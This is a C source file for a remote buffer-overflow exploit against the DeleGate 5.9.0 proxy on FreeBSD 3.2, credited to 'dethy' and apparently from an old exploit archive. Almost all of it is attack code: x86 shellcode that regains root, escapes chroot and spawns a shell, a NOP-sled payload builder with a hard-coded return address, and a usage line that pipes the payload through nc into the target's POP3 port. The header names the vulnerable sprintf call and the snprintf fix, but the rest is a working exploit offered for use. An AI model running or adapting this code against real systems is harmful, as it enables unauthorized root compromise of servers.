Delegate 5.9.0 remote exploit for FreeBSD 3.2.
c8b15f8cc3129759828d662578ab2d94ba4d1d03a02a5fce93716cbfba60a526
/*
Description: Delegate remote exploit, based on freebsd.org advisory.
Comments : exploit the bof in access.c - sprintf(auth,"%s",pass);
Solution : Rewrite all the sprintf()'s with snprintf()'s.
Exploit by dethy
[ www.synnergy.net ]
*/
#include <stdio.h>
#define BUFFERSIZE 242 // overflow 256 byte buffer
#define NOP 0x90
#define OFFSET 0xbfffe074
/* hex for euid=0 -> uid=0 - > chroot() -> shell */
char hellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb\x89\xd9"
"\xb3\x0c\xb0\x3f\xcd\x80\x31\xc0\x31\xdb\x89\xd9\xb3\x0c\x41\xb0"
"\x3f\xcd\x80\x31\xc0\x31\xdb\x89\xd9\xb3\x0c\x41\x41\xb0\x3f\xcd"
"\x80\x31\xc0\x31\xdb\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e"
"\x31\xc0\x31\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\x01\xb0\x27"
"\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d"
"\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0\x0c"
"\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46\x09\x8d\x5e\x08\xb0\x3d"
"\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46\x07"
"\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b"
"\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\x30"
"\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x6e\x67";
void usage(char *progname) {
fprintf(stderr,"Usage: (%s <login> <password> [<offset>]; cat) | nc <target> 110",progname);
exit(1);
}
int main(int argc, char **argv) {
char *ptr,buffer[BUFFERSIZE];
unsigned long *long_ptr,offset=OFFSET;
int i;
fprintf(stderr,"\nDelegate Remote Exploit - www.synnergy.net\n\n");
if (argc<3) usage(argv[0]);
if (argc==4) offset+=atol(argv[3]);
ptr=buffer;
memset(ptr,0,sizeof(buffer));
memset(ptr,NOP,sizeof(buffer)-strlen(hellcode)-16);
ptr+=sizeof(buffer)-strlen(hellcode)-16;
memcpy(ptr,hellcode,strlen(hellcode));
ptr+=strlen(hellcode);
long_ptr=(unsigned long*)ptr;
for(i=0;i<4;i++) *(long_ptr++)=offset;
ptr=(char *)long_ptr;
*ptr='\0';
fprintf(stderr,"Buffer size: %d\n",strlen(buffer));
fprintf(stderr,"Offset: 0x%lx\n\n",offset);
printf("USER %s\n",argv[1]);
sleep(1);
printf("PASS %s\n",buffer); // spawned shell!
sleep(1);
printf("uname -a; id\n");
return(0);
}
/* www.hack.co.za [21 July]*/